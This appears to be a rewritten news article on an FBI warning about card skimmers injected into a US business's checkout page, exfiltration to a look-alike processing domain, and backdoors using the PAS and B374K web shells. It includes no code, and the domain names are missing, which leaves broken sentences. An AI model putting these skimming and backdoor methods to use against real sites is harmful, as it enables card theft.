Online checkout pages for US businesses

Online checkout pages for US businesses are being hacked by threat actors who want to steal credit card data

In order to steal credit card information from unsuspecting customers, a threat actor has successfully compromised and altered a US business’ checkout page. Learn more about this threat.

The FBI has released a new FLASH report warning about cyber-criminals stealing credit card data from US businesses’ compromised checkout pages.

Must Read:

All it takes is a compromise

FBI reports that a threat actor infiltrated malicious PHP code into the company’s checkout page. This was according to FBI.

Which contained code to scrape and exfiltrate unsuspecting customer data from the shopping cart. Unwittingly, every user who purchased something from that compromised website would send their credit card information to the fraudsters.

Data was sent to fraudsters by setting up a connection and then sending it to, a spoofed card processing site. The domain name looks very similar to, which is a legitimate card processing business domain.

Most Popular:

TechRepublic discovered that the domain was fraudulently registered in December 2016 and that suspicious Internet users reported it being used fraudulently since at least November 2018.

More backdoors and other tools

Two different backdoors were installed by the threat actor on the compromised website.

The first backdoor was created by inserting one line code into the login process for the website. According to the FBI, the system would execute and download a PAS web shell that was fully functional onto the company’s website server. Fobushell, or the PAS web shell as it is also known, was created in 2016 by Profexer, a Ukrainian developer. You can find a modified version online. The web shell is composed of thousands of lines PHP code. This provides attackers with a user-friendly interface. Another web shell, B374K, was used by the threat actor to backdoor. It is easy to locate this web shell online, so it is not difficult for cybercriminals to obtain it and use it.

Also Read:

The attacker also used Adminer, a PHP-based tool for database management. This tool can be used for managing MySQL database content.

Credit card skimming has become a popular trend

This type of cybercrime is becoming more popular. Magecart is an example of a group that has been active since 2016 and targets thousands of websites to steal credit card data.

The availability of skimming equipment at relatively low prices has also contributed to an increase in skimming activity. Recent research has shown that the CaramelCorp skimming subscription cost $2,000 USD. This makes it easy for low-tech cybercriminals to get into the game and begin collecting credit card numbers for money theft.

Never Miss:  ‎

How to defend yourself from threats

As always, it is a good idea to patch all operating systems and any software or code running on your website. This will significantly reduce the chance of your website being compromised by a known vulnerability.